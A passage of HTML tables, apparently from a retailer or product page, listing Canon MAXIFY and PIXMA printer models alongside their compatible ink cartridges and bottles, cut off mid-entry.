(Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">MAXIFY MB5370</td>\r\n<td width=\"208\">PGI-2700 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">MAXIFY MB5470</td>\r\n<td width=\"208\">PGI-2700 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E3170</td>\r\n<td width=\"208\">CL-57 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-57S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-47 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E410</td>\r\n<td width=\"208\">CL-57 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-57S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-47 (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E4270</td>\r\n<td width=\"208\">CL-57 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-57S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-47 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E470</td>\r\n<td width=\"208\">CL-57 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-57S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-47 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E477</td>\r\n<td width=\"208\">CL-57S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-47 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E480</td>\r\n<td width=\"208\">CL-57 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-47 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E510</td>\r\n<td width=\"208\">CL-98 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-88 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E560</td>\r\n<td width=\"208\">CL-99 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-89 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA E560 / E560R</td>\r\n<td width=\"208\">CL-99 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-89 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA G1000</td>\r\n<td width=\"208\">GI-790 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA G1010</td>\r\n<td width=\"208\">GI-790 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA G2010</td>\r\n<td width=\"208\">GI-790 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA G3000</td>\r\n<td width=\"208\">GI-790 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA G3010</td>\r\n<td width=\"208\">GI-790 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA G4010</td>\r\n<td width=\"208\">GI-790 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">GI-790 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP100</td>\r\n<td width=\"208\">CLI-36 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-35 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP110</td>\r\n<td width=\"208\">CLI-36 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-35 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP110 (with battery)</td>\r\n<td width=\"208\">CLI-36 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-35 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP1300</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP2770 / iP2772</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP2870S</td>\r\n<td width=\"208\">CL-746 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745S (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP4200</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-5 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP7270</td>\r\n<td width=\"208\">CLI-751 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iP8770</td>\r\n<td width=\"208\">CLI-751 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iX6770</td>\r\n<td width=\"208\">CLI-751 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-755XXL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA iX6870</td>\r\n<td width=\"208\">CLI-751 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-750XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-755XXL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MG2570S</td>\r\n<td width=\"208\">CL-746 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745S (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MG2577S</td>\r\n<td width=\"208\">CL-746 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746S (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-746XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745S (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-745XL (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MG3570</td>\r\n<td width=\"208\">CL-741 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-741XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740/CL-741 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MG3670</td>\r\n<td width=\"208\">CL-741 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-741XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740/CL-741 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-740XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MG7570</td>\r\n<td width=\"208\">CLI-751 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-751XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP160</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP170</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP180</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP228</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-831 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-830 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP237</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP245</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP258</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP276</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP287</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP460</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP476</td>\r\n<td width=\"208\">CL-41 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-831 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-40/CL-41 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-830 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP486</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP496</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP497</td>\r\n<td width=\"208\">CL-811 (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CL-811XL (Colour)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810 Twin Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810/CL-811 Value Pack</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PG-810XL (Pigment Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">PIXMA MP500</td>\r\n<td width=\"208\">CLI-8 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">CLI-8 